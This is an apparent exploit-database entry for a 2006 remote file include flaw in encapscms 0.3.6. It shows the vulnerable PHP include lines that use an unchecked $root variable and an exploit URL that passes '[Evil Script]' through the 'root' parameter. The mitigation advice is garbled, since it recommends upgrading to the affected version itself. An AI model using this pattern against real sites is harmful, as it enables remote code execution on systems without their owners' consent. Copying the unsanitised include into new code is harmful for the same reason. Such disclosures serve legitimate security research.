encapscms 0.3.6 - Remote File Include by Firewall

vendor:

encapscms

by:

Firewall

9,3

CVSS

HIGH

Remote File Include

CWE

Product Name: encapscms

Affected Version From: 0.3.6

Affected Version To: 0.3.6

Patch Exists: YES

Related CWE: N/A

CPE: encapscms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

encapscms 0.3.6 – Remote File Include by Firewall

encapscms 0.3.6 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing a URL in the 'root' parameter to the vulnerable application. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of encapscms 0.3.6 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

########################### Firewall ###########################
encapscms 0.3.6  - Remote File Include by Firewall
BuG FounD by Firewall

# Application Affect:
encapscms 0.3.6

# Sorce Code:            
http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip

# Code:
         include_once($root."core/Config.php");
         include_once($root."core/DB_sql.php");
         include_once($root."core/BlogsCats.php");
         include_once($root."core/Block.php");
         include_once($root."core/Block_sub.php");
         include_once($root."core/Gallery.php");
         include_once($root."core/Pager.php");
         include_once($root."core/GalleryCategory.php");
         include_once($root."core/Misc.php");
       
# ExPloit :
http://www.site.com/encapscms_PATH/core/core.php?root=[Evil Script]

#Contact:    Firewall1954@hotmail.com 


# GrEatZ :
|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH| |Cvir.System|napster|saok|Zlevyn|Azrael|CyberAlexis| |NitroNet|Matasanos|SysRoot|ANtrAX|FaLENcE|Mnox|Xneo.System|

"El ceviche y El pisco es peruano y jamas podran igualar su calidad" - "Viva el Peru"

########################### Firewall ###########################

# milw0rm.com [2006-11-10]